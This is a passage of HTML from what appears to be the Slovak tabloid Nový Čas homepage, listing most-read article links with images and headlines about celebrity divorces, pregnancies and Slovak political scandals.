                title="Speváčka Kristína tajila tehotenstvo 8 mesiacov: Jednu vec nechcú s manželom povedať ani po pôrode"
                data-event="hp|najcitanejsie|clanok-8">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3320903.png/kristina-pelakova.png"
                title="Speváčka Kristína tajila tehotenstvo 8 mesiacov: Jednu vec nechcú s manželom povedať ani po pôrode | Nový Čas" alt="Speváčka Kristína"
                data-src="https://img.cas.sk/cas//320px-c1/3320903.png/kristina-pelakova.png"
                data-1024="https://img.cas.sk/cas//320px-c1/3320903.png/kristina-pelakova.png"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3320903.png/kristina-pelakova.png"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3320903.png/kristina-pelakova.png"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-8"
            href="/clanok/2533503/spevacka-kristina-tajila-tehotenstvo-8-mesiacov-jednu-vec-nechcu-s-manzelom-povedat-ani-po-porode/"
            title="Speváčka Kristína tajila tehotenstvo 8 mesiacov: Jednu vec nechcú s manželom povedať ani po pôrode"
            data-event="hp|najcitanejsie|clanok-8">
                <span class="hidden lg-visible md-visible sm-visible ">Speváčka Kristína tajila tehotenstvo 8 mesiacov: Jednu vec nechcú s manželom povedať ani po pôrode</span>
        
                <span class="hidden xs-visible">Speváčka Kristína porodila: Čo s manželom taja</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
			</div>			<div class="switch-content 3d hidden">        <div class="article-item article-item-first with-image">
            <div class="article-item-number  xs-hidden">1.</div>
            <a class="article-image hidden"
                href="/clanok/2532787/pripad-nabera-na-obratkach-obvineny-exsef-naka-branislav-zurian-preco-namaca-matovica/"
                title="Prípad naberá na obrátkach! Obvinený exšéf NAKA Branislav Zurian: Prečo namáča Matoviča?"
                data-event="hp|najcitanejsie|clanok-1">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3319433.jpg/igor-matovic-branislav-zurian.jpg"
                title="Prípad naberá na obrátkach! Obvinený exšéf NAKA Branislav Zurian: Prečo namáča Matoviča? | Nový Čas" alt="Prípad naberá"
                data-src="https://img.cas.sk/cas//320px-c1/3319433.jpg/igor-matovic-branislav-zurian.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3319433.jpg/igor-matovic-branislav-zurian.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3319433.jpg/igor-matovic-branislav-zurian.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3319433.jpg/igor-matovic-branislav-zurian.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-1"
            href="/clanok/2532787/pripad-nabera-na-obratkach-obvineny-exsef-naka-branislav-zurian-preco-namaca-matovica/"
            title="Prípad naberá na obrátkach! Obvinený exšéf NAKA Branislav Zurian: Prečo namáča Matoviča?"
            data-event="hp|najcitanejsie|clanok-1">
                <span class="hidden lg-visible md-visible sm-visible ">Prípad naberá na obrátkach! Obvinený exšéf NAKA Branislav Zurian: Prečo namáča Matoviča?</span>
        
                <span class="hidden xs-visible">Obvinený exšéf NAKA Branislav Zurian: Prečo namáča Matoviča?</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">2.</div>
            <a class="article-image hidden"
                href="/clanok/2533465/preco-telo-lucanskeho-51-vybrali-z-hrobu-blizky-priatel-odhalil-plan-vdovy/"
                title="Prečo telo Lučanského († 51) vybrali z hrobu?! Blízky priateľ odhalil plán vdovy"
                data-event="hp|najcitanejsie|clanok-2">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3320829.jpg/otec-cintorin-milan-lucansky-hrob-strba.jpg"
                title="Prečo telo Lučanského († 51) vybrali z hrobu?! Blízky priateľ odhalil plán vdovy | Nový Čas" alt="Prečo telo"
                data-src="https://img.cas.sk/cas//320px-c1/3320829.jpg/otec-cintorin-milan-lucansky-hrob-strba.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3320829.jpg/otec-cintorin-milan-lucansky-hrob-strba.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3320829.jpg/otec-cintorin-milan-lucansky-hrob-strba.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3320829.jpg/otec-cintorin-milan-lucansky-hrob-strba.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-2"
            href="/clanok/2533465/preco-telo-lucanskeho-51-vybrali-z-hrobu-blizky-priatel-odhalil-plan-vdovy/"
            title="Prečo telo Lučanského († 51) vybrali z hrobu?! Blízky priateľ odhalil plán vdovy"
            data-event="hp|najcitanejsie|clanok-2">
                <span class="hidden lg-visible md-visible sm-visible ">Prečo telo Lučanského († 51) vybrali z hrobu?! Blízky priateľ odhalil plán vdovy</span>
        
                <span class="hidden xs-visible">Prečo telo Lučanského († 51) vybrali z hrobu?!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">3.</div>
            <a class="article-image hidden"
                href="/clanok/2532557/bolestna-spoved-forgac-prehovoril-o-odluceni-od-manzelky-po-30-rokoch-pravda-o-nasom-rozvode/"
                title="Bolestná spoveď! Forgáč prehovoril o odlúčení od manželky po 30 rokoch: Pravda o našom rozvode"
                data-event="hp|najcitanejsie|clanok-3">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3318867.jpg/marcel-forgac-adriana-manzelka.jpg"
                title="Bolestná spoveď! Forgáč prehovoril o odlúčení od manželky po 30 rokoch: Pravda o našom rozvode | Nový Čas" alt="Bolestná spoveď!"
                data-src="https://img.cas.sk/cas//320px-c1/3318867.jpg/marcel-forgac-adriana-manzelka.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3318867.jpg/marcel-forgac-adriana-manzelka.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3318867.jpg/marcel-forgac-adriana-manzelka.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3318867.jpg/marcel-forgac-adriana-manzelka.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-3"
            href="/clanok/2532557/bolestna-spoved-forgac-prehovoril-o-odluceni-od-manzelky-po-30-rokoch-pravda-o-nasom-rozvode/"
            title="Bolestná spoveď! Forgáč prehovoril o odlúčení od manželky po 30 rokoch: Pravda o našom rozvode"
            data-event="hp|najcitanejsie|clanok-3">
                <span class="hidden lg-visible md-visible sm-visible ">Bolestná spoveď! Forgáč prehovoril o odlúčení od manželky po 30 rokoch: Pravda o našom rozvode</span>
        
                <span class="hidden xs-visible">Bolestná spoveď! Forgáč prehovoril o rozvode s manželkou </span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">4.</div>
            <a class="article-image hidden"
                href="/clanok/2533013/forgac-po-stroskotani-30-rocneho-vztahu-s-manzelkou-bitka-o-velke-majetky-o-co-vsetko-moze-pri-rozvode-prist/"
                title="Forgáč po stroskotaní 30-ročného vzťahu s manželkou: Bitka o veľké majetky! O čo všetko môže pri rozvode prísť?"
                data-event="hp|najcitanejsie|clanok-4">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3319927.jpg/marcel-forgac-adriana-manzelka.jpg"
                title="Forgáč po stroskotaní 30-ročného vzťahu s manželkou: Bitka o veľké majetky! O čo všetko môže pri rozvode prísť? | Nový Čas" alt="Forgáč po"
                data-src="https://img.cas.sk/cas//320px-c1/3319927.jpg/marcel-forgac-adriana-manzelka.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3319927.jpg/marcel-forgac-adriana-manzelka.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3319927.jpg/marcel-forgac-adriana-manzelka.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3319927.jpg/marcel-forgac-adriana-manzelka.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-4"
            href="/clanok/2533013/forgac-po-stroskotani-30-rocneho-vztahu-s-manzelkou-bitka-o-velke-majetky-o-co-vsetko-moze-pri-rozvode-prist/"
            title="Forgáč po stroskotaní 30-ročného vzťahu s manželkou: Bitka o veľké majetky! O čo všetko môže pri rozvode prísť?"
            data-event="hp|najcitanejsie|clanok-4">
                <span class="hidden lg-visible md-visible sm-visible ">Forgáč po stroskotaní 30-ročného vzťahu s manželkou: Bitka o veľké majetky! O čo všetko môže pri rozvode prísť?</span>
        
                <span class="hidden xs-visible">Forgáč po stroskotaní 30-ročného vzťahu s manželkou: Bitka o veľké majetky!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">5.</div>
            <a class="article-image hidden"
                href="/clanok/2529533/hlasova-pedagogicka-zo-sou-tvoja-tvar-janka-danova-otvorene-po-rozvode-byva-s-mamou-a-synom/"
                title="Hlasová pedagogička zo šou Tvoja tvár Janka Daňová otvorene: Po rozvode býva s mamou a synom"
                data-event="hp|najcitanejsie|clanok-5">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3312869.jpg/viktor-vincze-tvoja-tvar-znie-povedome-jana-danova.jpg"
                title="Hlasová pedagogička zo šou Tvoja tvár Janka Daňová otvorene: Po rozvode býva s mamou a synom | Nový Čas" alt="Hlasová pedagogička"
                data-src="https://img.cas.sk/cas//320px-c1/3312869.jpg/viktor-vincze-tvoja-tvar-znie-povedome-jana-danova.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3312869.jpg/viktor-vincze-tvoja-tvar-znie-povedome-jana-danova.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3312869.jpg/viktor-vincze-tvoja-tvar-znie-povedome-jana-danova.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3312869.jpg/viktor-vincze-tvoja-tvar-znie-povedome-jana-danova.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-5"
            href="/clanok/2529533/hlasova-pedagogicka-zo-sou-tvoja-tvar-janka-danova-otvorene-po-rozvode-byva-s-mamou-a-synom/"
            title="Hlasová pedagogička zo šou Tvoja tvár Janka Daňová otvorene: Po rozvode býva s mamou a synom"
            data-event="hp|najcitanejsie|clanok-5">
                <span class="hidden lg-visible md-visible sm-visible ">Hlasová pedagogička zo šou Tvoja tvár Janka Daňová otvorene: Po rozvode býva s mamou a synom</span>
        
                <span class="hidden xs-visible">Pedagogička Janka Daňová: Po rozvode býva s mamou a synom</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">6.</div>
            <a class="article-image hidden"
                href="/clanok/2533077/co-sa-to-deje-medzi-sme-rodina-a-olano-kollar-nepodrzi-matovica-nekompromisny-odkaz/"
                title="Čo sa to deje medzi Sme rodina a OĽaNO? Kollár nepodrží Matoviča! Nekompromisný odkaz"
                data-event="hp|najcitanejsie|clanok-6">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3320115.jpg/matovic-kollar.jpg"
                title="Čo sa to deje medzi Sme rodina a OĽaNO? Kollár nepodrží Matoviča! Nekompromisný odkaz | Nový Čas" alt="Čo sa"
                data-src="https://img.cas.sk/cas//320px-c1/3320115.jpg/matovic-kollar.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3320115.jpg/matovic-kollar.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3320115.jpg/matovic-kollar.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3320115.jpg/matovic-kollar.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-6"
            href="/clanok/2533077/co-sa-to-deje-medzi-sme-rodina-a-olano-kollar-nepodrzi-matovica-nekompromisny-odkaz/"
            title="Čo sa to deje medzi Sme rodina a OĽaNO? Kollár nepodrží Matoviča! Nekompromisný odkaz"
            data-event="hp|najcitanejsie|clanok-6">
                <span class="hidden lg-visible md-visible sm-visible ">Čo sa to deje medzi Sme rodina a OĽaNO? Kollár nepodrží Matoviča! Nekompromisný odkaz</span>
        
                <span class="hidden xs-visible">Čo sa to deje medzi Sme rodina a OĽaNO? Kollár nepodrží Matoviča!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">7.</div>
            <a class="article-image hidden"
                href="/clanok/2533399/sona-skoncova-zverejnila-uplakanu-fotku-problem-so-syncekom-sa-opakuje-kazdy-vecer/"
                title="Soňa Skoncová zverejnila uplakanú fotku: Problém so synčekom sa opakuje každý večer"
                data-event="hp|najcitanejsie|clanok-7">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3320599.png/syn-sona-skoncova-robko.png"
                title="Soňa Skoncová zverejnila uplakanú fotku: Problém so synčekom sa opakuje každý večer | Nový Čas" alt="Soňa Skoncová"
                data-src="https://img.cas.sk/cas//320px-c1/3320599.png/syn-sona-skoncova-robko.png"
                data-1024="https://img.cas.sk/cas//320px-c1/3320599.png/syn-sona-skoncova-robko.png"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3320599.png/syn-sona-skoncova-robko.png"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3320599.png/syn-sona-skoncova-robko.png"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-7"
            href="/clanok/2533399/sona-skoncova-zverejnila-uplakanu-fotku-problem-so-syncekom-sa-opakuje-kazdy-vecer/"
            title="Soňa Skoncová zverejnila uplakanú fotku: Problém so synčekom sa opakuje každý večer"
            data-event="hp|najcitanejsie|clanok-7">
                <span class="hidden lg-visible md-visible sm-visible ">Soňa Skoncová zverejnila uplakanú fotku: Problém so synčekom sa opakuje každý večer</span>
        
                <span class="hidden xs-visible">Uplakaná Skoncová: Problém so synčekom sa opakuje každý večer</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">8.</div>
            <a class="article-image hidden"
                href="/clanok/2533071/drsna-odplata-bratislavska-restauracia-vytvorila-ciernu-listinu-tychto-politikov-u-nas-neobsluzime/"
                title="Drsná odplata! Bratislavská reštaurácia vytvorila čiernu listinu: Týchto politikov u nás neobslúžime"
                data-event="hp|najcitanejsie|clanok-8">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3320139.jpg/bratislava-odmietanie-politici-zverejnenie-pivovar-blacklist-obsluzenie.jpg"
                title="Drsná odplata! Bratislavská reštaurácia vytvorila čiernu listinu: Týchto politikov u nás neobslúžime | Nový Čas" alt="Drsná odplata!"
                data-src="https://img.cas.sk/cas//320px-c1/3320139.jpg/bratislava-odmietanie-politici-zverejnenie-pivovar-blacklist-obsluzenie.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3320139.jpg/bratislava-odmietanie-politici-zverejnenie-pivovar-blacklist-obsluzenie.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3320139.jpg/bratislava-odmietanie-politici-zverejnenie-pivovar-blacklist-obsluzenie.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3320139.jpg/bratislava-odmietanie-politici-zverejnenie-pivovar-blacklist-obsluzenie.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-8"
            href="/clanok/2533071/drsna-odplata-bratislavska-restauracia-vytvorila-ciernu-listinu-tychto-politikov-u-nas-neobsluzime/"
            title="Drsná odplata! Bratislavská reštaurácia vytvorila čiernu listinu: Týchto politikov u nás neobslúžime"
            data-event="hp|najcitanejsie|clanok-8">
                <span class="hidden lg-visible md-visible sm-visible ">Drsná odplata! Bratislavská reštaurácia vytvorila čiernu listinu: Týchto politikov u nás neobslúžime</span>
        
                <span class="hidden xs-visible">Bratislavská reštaurácia vytvorila čiernu listinu: Týchto politikov u nás neobslúžime!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
			</div>			<div class="switch-content 7d hidden">        <div class="article-item article-item-first with-image">
            <div class="article-item-number  xs-hidden">1.</div>
            <a class="article-image hidden"
                href="/clanok/2531643/markizacka-hospodarova-prichytena-s-novym-muzom-opat-zamilovana-fotka-ktora-hovori-za-vsetko/"
                title="Markizáčka Hospodárová prichytená s novým mužom: Opäť zamilovaná! Fotka, ktorá hovorí za všetko"
                data-event="hp|najcitanejsie|clanok-1">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3316957.jpg"
                title="Markizáčka Hospodárová prichytená s novým mužom: Opäť zamilovaná! Fotka, ktorá hovorí za všetko | Nový Čas" alt="Markizáčka Hospodárová"
                data-src="https://img.cas.sk/cas//320px-c1/3316957.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3316957.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3316957.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3316957.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-1"
            href="/clanok/2531643/markizacka-hospodarova-prichytena-s-novym-muzom-opat-zamilovana-fotka-ktora-hovori-za-vsetko/"
            title="Markizáčka Hospodárová prichytená s novým mužom: Opäť zamilovaná! Fotka, ktorá hovorí za všetko"
            data-event="hp|najcitanejsie|clanok-1">
                <span class="hidden lg-visible md-visible sm-visible ">Markizáčka Hospodárová prichytená s novým mužom: Opäť zamilovaná! Fotka, ktorá hovorí za všetko</span>
        
                <span class="hidden xs-visible">Markizáčka Hospodárová: Opäť zamilovaná!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">2.</div>
            <a class="article-image hidden"
                href="/clanok/2532557/bolestna-spoved-forgac-prehovoril-o-odluceni-od-manzelky-po-30-rokoch-pravda-o-nasom-rozvode/"
                title="Bolestná spoveď! Forgáč prehovoril o odlúčení od manželky po 30 rokoch: Pravda o našom rozvode"
                data-event="hp|najcitanejsie|clanok-2">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3318867.jpg/marcel-forgac-adriana-manzelka.jpg"
                title="Bolestná spoveď! Forgáč prehovoril o odlúčení od manželky po 30 rokoch: Pravda o našom rozvode | Nový Čas" alt="Bolestná spoveď!"
                data-src="https://img.cas.sk/cas//320px-c1/3318867.jpg/marcel-forgac-adriana-manzelka.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3318867.jpg/marcel-forgac-adriana-manzelka.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3318867.jpg/marcel-forgac-adriana-manzelka.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3318867.jpg/marcel-forgac-adriana-manzelka.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-2"
            href="/clanok/2532557/bolestna-spoved-forgac-prehovoril-o-odluceni-od-manzelky-po-30-rokoch-pravda-o-nasom-rozvode/"
            title="Bolestná spoveď! Forgáč prehovoril o odlúčení od manželky po 30 rokoch: Pravda o našom rozvode"
            data-event="hp|najcitanejsie|clanok-2">
                <span class="hidden lg-visible md-visible sm-visible ">Bolestná spoveď! Forgáč prehovoril o odlúčení od manželky po 30 rokoch: Pravda o našom rozvode</span>
        
                <span class="hidden xs-visible">Bolestná spoveď! Forgáč prehovoril o rozvode s manželkou </span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">3.</div>
            <a class="article-image hidden"
                href="/clanok/2531653/boss-cernak-nenechal-smrt-mafiana-bez-komentara-posledny-odkaz-a-uznanie-borzovi-49/"
                title="Boss Černák nenechal smrť mafiána bez komentára: Posledný odkaz a uznanie Boržovi († 49)!"
                data-event="hp|najcitanejsie|clanok-3">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3317019.png/mikulas-cernak-dusan-borzensky.png"
                title="Boss Černák nenechal smrť mafiána bez komentára: Posledný odkaz a uznanie Boržovi († 49)! | Nový Čas" alt="Boss Černák"
                data-src="https://img.cas.sk/cas//320px-c1/3317019.png/mikulas-cernak-dusan-borzensky.png"
                data-1024="https://img.cas.sk/cas//320px-c1/3317019.png/mikulas-cernak-dusan-borzensky.png"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3317019.png/mikulas-cernak-dusan-borzensky.png"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3317019.png/mikulas-cernak-dusan-borzensky.png"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-3"
            href="/clanok/2531653/boss-cernak-nenechal-smrt-mafiana-bez-komentara-posledny-odkaz-a-uznanie-borzovi-49/"
            title="Boss Černák nenechal smrť mafiána bez komentára: Posledný odkaz a uznanie Boržovi († 49)!"
            data-event="hp|najcitanejsie|clanok-3">
                <span class="hidden lg-visible md-visible sm-visible ">Boss Černák nenechal smrť mafiána bez komentára: Posledný odkaz a uznanie Boržovi († 49)!</span>
        
                <span class="hidden xs-visible">Posledný odkaz Boržovi († 49) od bossa Černáka!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">4.</div>
            <a class="article-image hidden"
                href="/clanok/2532787/pripad-nabera-na-obratkach-obvineny-exsef-naka-branislav-zurian-preco-namaca-matovica/"
                title="Prípad naberá na obrátkach! Obvinený exšéf NAKA Branislav Zurian: Prečo namáča Matoviča?"
                data-event="hp|najcitanejsie|clanok-4">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3319433.jpg/igor-matovic-branislav-zurian.jpg"
                title="Prípad naberá na obrátkach! Obvinený exšéf NAKA Branislav Zurian: Prečo namáča Matoviča? | Nový Čas" alt="Prípad naberá"
                data-src="https://img.cas.sk/cas//320px-c1/3319433.jpg/igor-matovic-branislav-zurian.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3319433.jpg/igor-matovic-branislav-zurian.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3319433.jpg/igor-matovic-branislav-zurian.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3319433.jpg/igor-matovic-branislav-zurian.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-4"
            href="/clanok/2532787/pripad-nabera-na-obratkach-obvineny-exsef-naka-branislav-zurian-preco-namaca-matovica/"
            title="Prípad naberá na obrátkach! Obvinený exšéf NAKA Branislav Zurian: Prečo namáča Matoviča?"
            data-event="hp|najcitanejsie|clanok-4">
                <span class="hidden lg-visible md-visible sm-visible ">Prípad naberá na obrátkach! Obvinený exšéf NAKA Branislav Zurian: Prečo namáča Matoviča?</span>
        
                <span class="hidden xs-visible">Obvinený exšéf NAKA Branislav Zurian: Prečo namáča Matoviča?</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">5.</div>
            <a class="article-image hidden"
                href="/clanok/2532235/necakane-priznanie-marcela-forgaca-rozvod-po-30-rokoch-moderator-odhalil-dovod/"
                title="Nečakané priznanie Marcela Forgáča: Rozvod po 30 rokoch! Moderátor odhalil dôvod"
                data-event="hp|najcitanejsie|clanok-5">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3318211.jpg/adriana-prichody-oto-2019-forgac.jpg"
                title="Nečakané priznanie Marcela Forgáča: Rozvod po 30 rokoch! Moderátor odhalil dôvod | Nový Čas" alt="Nečakané priznanie"
                data-src="https://img.cas.sk/cas//320px-c1/3318211.jpg/adriana-prichody-oto-2019-forgac.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3318211.jpg/adriana-prichody-oto-2019-forgac.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3318211.jpg/adriana-prichody-oto-2019-forgac.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3318211.jpg/adriana-prichody-oto-2019-forgac.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-5"
            href="/clanok/2532235/necakane-priznanie-marcela-forgaca-rozvod-po-30-rokoch-moderator-odhalil-dovod/"
            title="Nečakané priznanie Marcela Forgáča: Rozvod po 30 rokoch! Moderátor odhalil dôvod"
            data-event="hp|najcitanejsie|clanok-5">
                <span class="hidden lg-visible md-visible sm-visible ">Nečakané priznanie Marcela Forgáča: Rozvod po 30 rokoch! Moderátor odhalil dôvod</span>
        
                <span class="hidden xs-visible">Nečakané priznanie Marcela Forgáča: Rozvod po 30 rokoch!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">6.</div>
            <a class="article-image hidden"
                href="/clanok/2532475/exsef-naka-zurian-po-razii-prehovoril-a-odkazuje-bat-by-sa-mal-niekto-iny/"
                title="Exšéf NAKA Zurian po razii prehovoril a odkazuje: Báť by sa mal niekto iný!"
                data-event="hp|najcitanejsie|clanok-6">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3318743.jpg/naka-riaditel-branislav-zurian.jpg"
                title="Exšéf NAKA Zurian po razii prehovoril a odkazuje: Báť by sa mal niekto iný! | Nový Čas" alt="Exšéf NAKA"
                data-src="https://img.cas.sk/cas//320px-c1/3318743.jpg/naka-riaditel-branislav-zurian.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3318743.jpg/naka-riaditel-branislav-zurian.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3318743.jpg/naka-riaditel-branislav-zurian.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3318743.jpg/naka-riaditel-branislav-zurian.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-6"
            href="/clanok/2532475/exsef-naka-zurian-po-razii-prehovoril-a-odkazuje-bat-by-sa-mal-niekto-iny/"
            title="Exšéf NAKA Zurian po razii prehovoril a odkazuje: Báť by sa mal niekto iný!"
            data-event="hp|najcitanejsie|clanok-6">
                <span class="hidden lg-visible md-visible sm-visible ">Exšéf NAKA Zurian po razii prehovoril a odkazuje: Báť by sa mal niekto iný!</span>
        
                <span class="hidden xs-visible">Zurian po razii prehovoril a odkazuje: Báť by sa mal niekto iný!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">7.</div>
            <a class="article-image hidden"
                href="/clanok/2533465/preco-telo-lucanskeho-51-vybrali-z-hrobu-blizky-priatel-odhalil-plan-vdovy/"
                title="Prečo telo Lučanského († 51) vybrali z hrobu?! Blízky priateľ odhalil plán vdovy"
                data-event="hp|najcitanejsie|clanok-7">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3320829.jpg/otec-cintorin-milan-lucansky-hrob-strba.jpg"
                title="Prečo telo Lučanského († 51) vybrali z hrobu?! Blízky priateľ odhalil plán vdovy | Nový Čas" alt="Prečo telo"
                data-src="https://img.cas.sk/cas//320px-c1/3320829.jpg/otec-cintorin-milan-lucansky-hrob-strba.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3320829.jpg/otec-cintorin-milan-lucansky-hrob-strba.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3320829.jpg/otec-cintorin-milan-lucansky-hrob-strba.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3320829.jpg/otec-cintorin-milan-lucansky-hrob-strba.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-7"
            href="/clanok/2533465/preco-telo-lucanskeho-51-vybrali-z-hrobu-blizky-priatel-odhalil-plan-vdovy/"
            title="Prečo telo Lučanského († 51) vybrali z hrobu?! Blízky priateľ odhalil plán vdovy"
            data-event="hp|najcitanejsie|clanok-7">
                <span class="hidden lg-visible md-visible sm-visible ">Prečo telo Lučanského († 51) vybrali z hrobu?! Blízky priateľ odhalil plán vdovy</span>
        
                <span class="hidden xs-visible">Prečo telo Lučanského († 51) vybrali z hrobu?!</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">8.</div>
            <a class="article-image hidden"
                href="/clanok/2532405/vycerpana-zdravotna-sestra-padla-na-dno-svojich-sil-balim-to-trpky-odkaz-nasim-politikom/"
                title="Vyčerpaná zdravotná sestra padla na dno svojich síl: Balím to! Trpký odkaz našim politikom"
                data-event="hp|najcitanejsie|clanok-8">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3318477.jpg/zdravotna-sestra-sestricka.jpg"
                title="Vyčerpaná zdravotná sestra padla na dno svojich síl: Balím to! Trpký odkaz našim politikom | Nový Čas" alt="Vyčerpaná zdravotná"
                data-src="https://img.cas.sk/cas//320px-c1/3318477.jpg/zdravotna-sestra-sestricka.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3318477.jpg/zdravotna-sestra-sestricka.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3318477.jpg/zdravotna-sestra-sestricka.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3318477.jpg/zdravotna-sestra-sestricka.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-8"
            href="/clanok/2532405/vycerpana-zdravotna-sestra-padla-na-dno-svojich-sil-balim-to-trpky-odkaz-nasim-politikom/"
            title="Vyčerpaná zdravotná sestra padla na dno svojich síl: Balím to! Trpký odkaz našim politikom"
            data-event="hp|najcitanejsie|clanok-8">
